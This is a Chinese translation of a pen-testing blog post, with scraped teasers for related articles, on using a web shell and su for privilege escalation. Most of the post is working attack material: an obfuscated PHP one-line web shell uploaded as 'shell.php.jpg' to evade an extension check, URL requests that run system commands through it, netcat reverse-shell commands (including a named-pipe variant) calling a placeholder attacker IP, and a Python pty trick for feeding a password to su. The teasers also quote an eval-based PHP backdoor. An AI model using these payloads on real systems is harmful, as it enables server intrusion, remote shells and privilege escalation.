[译]web shell中使用su

最新推荐文章于 2024-11-27 11:30:26 发布
原创 最新推荐文章于 2024-11-27 11:30:26 发布 · 247 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell #php #python

本文重点讲述了如何利用WebShell和su/sudo命令进行权限提升,通过绕过扩展名检查并建立连会攻击者的Netcat session,最终实现对目标系统的权限提升。详细介绍了构建WebShell的过程,以及在不同环境下建立Netcat session的方法,并讨论了在无法使用-e选项的情况下如何使用Python伪造终端来绕过限制。
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2014/07/08/sneaky-stealthy-su-in-web-shells[/url]
[b][color=red]本文的重点是讲述如何使用su[/color][/b]
场景:web服务器中存在一个上传漏洞,site确保上传文件以.jpg或.png结尾。这时,上传一个shell.php.jpg,包含如下代码:
<?php @extract($_REQUEST); @die ($ctime($atime)); ?>

该这个shell绕过了扩展名检查,但是由于它在文件名中包含.php,许多系统把它当成脚本执行。同时,这个shell不包含"/bin/sh","shell_exec"或system字符串。
$ curl "http://Site/shell.php.jpg?ctime=system&atime=whoami"
apache

现在我们拥有了一个webshell。
接下来是建立一个连会攻击者的netcat session
http://Site/shell.php.jpg?ctime=system&atime=nc+-nv+my.attack.er.ip+80+-e+/bin/sh

如果目标机的netcat不支持-e选项,参考GAPING_SECURITY_HOLE选项,可以使用下面的方法(参考:[url]http://pen-testing.sans.org/blog/pen-testing/2013/05/06/netcat-without-e-no-problem[/url]):
http://Site/shell.php.jpg?ctime=system&atime=mknod+/tmp/mypipe+p;+/bin/sh+</tmp/mypipe+|+nc+my.attack.er.ip+80+>/tmp/mypipe

一旦我们建立了shell,接下来使用su/sudo来提权,因为他们使用一种特殊方法来交互(s使用sudo,参考[url]http://ecstaticsec.tumblr.com/post/87205770569/sudo-tricks[/url])
如果你不想有一个反向连接到你的server的connection,但是你该如何升级权限?因为sudo不可能出现在/etc/sudoers文件中。su有一个-c选项,允许我们指定命令。但是我们有一个问题,我们需要运行su以及提供一个密码。如果我莫使用echo来访su传递密码会怎样?
$ echo password | su -c whoami

[color=blue]必须是一个tty[/color]
可能会得到一个“must be run from a terminal”错误--su命令希望我们从终端运行。
我们可以使用python来伪造一个终端:
(sleep 1; echo password) | python -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"
11、Linux Shell 使用与文件系统导航指南
css33的专栏
05-16 95
本博客详细介绍了Linux Shell使用方法和文件系统导航技巧,包括Shell的基础配置、提示符设置、环境变量添加、命令信息获取方法,以及Linux文件系统的结构和常见目录作用。此外,还涵盖了文件和目录的基本操作,如创建、复制、移动、权限和所有权更改等内容。通过学习和实践,用户可以高效地管理和操作Linux系统。
渗透实战-vulnhub-Mr-Robot: 1
qq_52263650的博客
04-23 493
WordPress后台getshell思路getshell后可以将其提升为交互式shell一个新的提权思路:通过SUID权限文件提权。
第二十四天 (重要!)在vulnhub中得到的小知识
weixin_46653764的博客
07-17 652
1、SSH ssh 是一种安全网络协议(远程登录) 通过SSH,可以把所有传输的数据进行加密,也能够防止DNS欺骗和IP欺骗。还有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的速度。 (1)口令登录 ssh 客户端用户名@服务器ip地址 ssh ldz@192.168.0.1 SSH服务的默认端口是22,也就是说,如果你不设置端口的话登录请求会自动送到远程主机的22端口。我们可以使用 -p 选项来修改端口号,比如连接到服务器的1234端口 ssh -p 1234 ldz@192.168.0
科迅免杀php一句话_那些强悍的PHP一句话后门
weixin_39526872的博客
12-21 369
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的 PHP一句话 后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was...
暗组免杀php,那些强悍的PHP一句话后门
weixin_33023513的博客
03-09 594
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马PHP1234567891011404 Not FoundNot FoundThe requested URL ...
PHP Backdoors: Hidden With Clever Use of Extract Function
cnbird's blog
02-18 1053
When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back to the site; this type of malware is called a backdoor. This type of malwa
只是一个小的shell脚本来找到的主机上运行的特殊服务(Web服务器、SSH、Telnet)在局域网中使用Nmap。.zip
04-13
在这个压缩包中包含的是一个Shell脚本,用于在局域网内使用Nmap工具寻找运行特定服务(如Web服务器、SSH和Telnet)的主机。Nmap是一款强大的网络扫描工具,广泛应用于网络安全检测、系统审计以及网络管理。下面将...
2022DASCTF X SU 三月春季挑战赛 web复现
akxnxbshai的博客
06-12 1200
2022DASCTF X SU 三月春季挑战赛复现一下。
Scala配置教程和spark-shell使用教程
m0_74216612的博客
11-27 1270
`.zip` 文件可以使用任何支持 ZIP 格式的工具来解压,包括 Windows 的默认文件管理器、macOS 上的 Archive Utility,或命令行中的 `unzip` 工具。- `.tgz` 文件需要使用类似 `tar` 或 `gzip` 的工具来解压。- `.tgz` 是一个经过 `tar` 打包后,再使用 `gzip` 压缩的文件格式。- `.tgz` 格式通常会有稍微更好的压缩效率,因为 `tar` 和 `gzip` 的组合通常能在保持高压缩比的同时提供较好的解压性能。
Shell脚本实现启动PHP内置FastCGI Server
09-15
在本文中,我们将深入探讨如何使用Shell脚本来启动PHP内置的FastCGI服务器,这是在没有php-fpm等专用进程管理器的情况下,为PHP提供FastCGI服务的一种方法。FastCGI是一种协议,用于在Web服务器(如Nginx)和动态...
shell 脚本里su密码_shell脚本从入门到放弃
weixin_39995108的博客
11-26 1324
1.首先什么玩意是shell脚本:shell就是将需要执行的命令保存到脚本中执行,去做重复、复杂的工作来一个简单的例子理解脚本:(写个脚本jiaoben.sh)[root@pixiaoxian ~]# vim jiaoben.sh [root@pixiaoxian ~]# cat jiaoben.sh #!/usr/bin/bash mkdir code cd code for ((i=0;...
su - make the shell a login shell
大鱼的专栏
09-25 1267
今天用oracle user执行命令时,出现线面的错误: ERROR:ORA-01031: insufficient privilegesSP2-0640: Not connectedAll indexes are rebuilt. 经人指点,原来问题出在su su manual ---  http://www.delorie.com/gnu/docs/
常见webshell工具
wuhao
11-23 5079
WebShell客户端是一种用于服务器上WebShell后门与攻击客户端之间进行通信的程序,我们通常可以根据WebShell客户端的流量来判断服务器上是否存在WebShell后门。【注:本机安装环境为Ubuntu 20.04.2 LTS】 1. Platypus Platypus 是一款支持多会话的交互式反向 Shell 管理器。 在实际的渗透测试中,为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增...
WEBSHELL 提权方法总结
tsvico的博客
04-19 3004
WEBSHELL  提权方法总结 在得到了一个 Webshell 之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津 津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望 对大家有所启发,起到一个抛砖引玉的作用 WEBSHELL 权限提升技巧 c: d: e:..... C:\Documents and Settin
Shellsu 切换用户
weixin_34293141的博客
03-09 684
为什么80%的码农都做不了架构师?>>> ...
shell不能执行su 后的脚本
weixin_30532759的博客
02-27 782
问题:在shell脚本中执行“su – 用户名”后,脚本终止执行,并且切换到su 中指定用户名的交互式界面 现象:我在root中执行一个脚本,但是其中的一些命令或脚本必须用oracle用户来执行。, [root@HZ-ITF-01 cron.d]# vi /data/itf/app/oracle/sync/test.sh #!/bin/bash set -x su -...
phpweb后台拿shell简单方法
sxf_123456的博客
04-24 6127
关于phpweb后台拿shell简单方法。   首先登录后台admin.php   登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。    代码文件如下:             然后选择你的马儿再上传   上传后如果为iis
【CI】must be run from a terminal
tiandaochouqin99的博客
11-15 2949
这里在登录docker 容器时,遇到了权限不足。解决办法时切换成root 身份登录 jenkins@3ec4412484f8:/$ su - root su: must be run from a terminal jenkins@3ec4412484f8:/$ cd /root bash: cd: /root: Permission denied jenkins@3ec4412484f8:/$...
黑客常用 Linux 入侵常用命令
热门推荐
杨春建的博客
02-10 1万+
原文地址:http://blog.youkuaiyun.com/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "&lt;?php @eval(\$_POST[md5])?&gt;" &gt;rankuplog_time.php[jobcruit@wa64-054 rankup_l...
不适用pipline,使用普通shell脚本
最新发布
10-11
尽管引用中提到了Jenkins,但用户要求不使用Pipeline,因此我们聚焦在Gerrit钩子直接调用shell脚本的方案。 ### 解决方案:通过Gerrit的`ref-update`钩子触发gitlint检查并反馈结果 #### 步骤1:在Gerrit服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值